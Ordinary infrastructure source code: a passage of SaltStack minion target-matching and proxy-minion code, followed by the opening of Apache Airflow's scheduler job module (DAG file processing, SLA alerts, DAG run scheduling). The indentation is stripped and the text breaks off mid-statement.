self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on ip address or CIDR notation
'''
num_parts = len(tgt.split('/'))
if num_parts > 2:
# Target is not valid CIDR
return False
elif num_parts == 2:
# Target is CIDR
return salt.utils.network.in_subnet(
tgt,
addrs=self.opts['grains'].get('ipv4', [])
)
else:
# Target is an IPv4 address
import socket
try:
socket.inet_aton(tgt)
except socket.error:
# Not a valid IPv4 address
return False
else:
return tgt in self.opts['grains'].get('ipv4', [])
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types):
log.debug('Compound target received that is not a string')
return False
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
tokens = tgt.split()
for match in tokens:
# Try to match tokens from the compound target, first by using
# the 'G, X, I, L, S, E' matcher types, then by hostname glob.
if '@' in match and match[1] == '@':
comps = match.split('@')
matcher = ref.get(comps[0])
if not matcher:
# If an unknown matcher is called at any time, fail out
return False
results.append(
str(
getattr(self, '{0}_match'.format(matcher))(
'@'.join(comps[1:])
)
)
)
elif match in opers:
# We didn't match a target, so append a boolean operator or
# subexpression
if results or match in ['(', ')']:
if match == 'not':
match_suffix = results[-1]
if not (match_suffix == 'and' or match_suffix == 'or'):
results.append('and')
results.append(match)
else:
# seq start with oper, fail
if match not in ['(', ')']:
return False
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(match)))
results = ' '.join(results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
def __init__(self, opts, timeout=60, safe=True): # pylint: disable=W0231
'''
Pass in the options dict
'''
self._running = None
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module
# print opts['proxymodule']
fq_proxyname = 'proxy.'+opts['proxy']['proxytype']
self.proxymodule = salt.loader.proxy(opts, fq_proxyname)
opts['proxyobject'] = self.proxymodule[opts['proxy']['proxytype']+'.Proxyconn'](opts['proxy'])
opts['id'] = opts['proxyobject'].id(opts)
opts.update(resolve_dns(opts))
self.opts = opts
self.opts['pillar'] = salt.pillar.get_pillar(
opts,
opts['grains'],
opts['id'],
opts['environment']
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
uid = salt.utils.get_uid(user=opts.get('user', None))
self.proc_dir = get_proc_dir(opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
self.grains_cache = self.opts['grains']
# self._running = True
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
return super(ProxyMinion, self)._prep_mod_opts()
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
return super(ProxyMinion, self)._load_modules(force_refresh=force_refresh, notify=notify)
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout
from datetime import timedelta
from time import sleep
from typing import List, Set
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException
from airflow.executors.local_executor import LocalExecutor
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagRun, SlaMiss, errors
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.stats import Stats
from airflow.ti_deps.dep_context import SCHEDULEABLE_STATES, SCHEDULED_DEPS, DepContext
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessorProcess, DagFileProcessorAgent, SimpleDag, SimpleDagBag,
)
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.file import list_py_file_paths
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.session import provide_session
from airflow.utils.state import State
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: List[str]
:param zombies: zombie task instances to kill
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
self._file_path = file_path
# The process that was launched to process the given .
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param zombies: zombie task instances to kill
:type zombies: list[airflow.models.taskinstance.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)),\
redirect_stderr(StreamLogWriter(log, logging.WARN)):
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_id_white_list, log=log)
result = dag_file_processor.process_file(
file_path=file_path,
zombies=zombies,
pickle_dags=pickle_dags
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
def __init__(self, dag_ids, log):
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = [dag.get_task(sla.task_id) for sla in slas]
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
)
)
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future
if run.execution_date > timezone.utcnow():
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
run.update_state(session=session)
if run.state == State.RUNNING:
make_transient(run)
active_dag_runs.append(run)
for run in active_dag_runs:
self.log.debug("Examining active DAG run: %s", run)
tis = run.get_task_instances(state=SCHEDULEABLE_STATES)
# this loop is quite slow as it uses are_dependencies_met for
# every task (in ti.is_runnable). This is also called in
# update_state above which has already checked these tasks
for ti in tis:
task = dag.get_task(ti.task_id)
# fixme: ti.task is transient but needs to be set
ti.task = task
if ti.are_dependencies_met(
dep_context=DepContext(flag_upstream_failed=True),
session=session
):
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs (if CHECK_SLAS config enabled).
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: airflow.models.DAG
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
check_slas = conf.getboolean('core', 'CHECK_SLAS', fallback=True)
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
if not dag.is_subdag:
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
if check_slas:
self.manage_slas(dag)
def _find_dags_to_process(self, dags: List[DAG], paused_dag_ids: Set[str]):
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:param paused_dag_ids: paused DAG IDs
:return: DAGs to process
"""
if len(self.dag_ids) > 0:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dags
if dag.dag_id not in paused_dag_ids]
return dags
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param zombies: zombie task instances to kill.
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: List[airflow.utils.dag_processing.SimpleDagBag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = {dag.dag_id for dag in dagbag.dags.values() if dag.is_paused}
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
dags = self._find_dags_to_process(dagbag.dags.values(), paused_dag_ids)
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True
):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
if 'sqlite' in conf.get('core', 'sql_alchemy_conn'):
self.using_sqlite = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).seconds < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
if self.using_sqlite:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
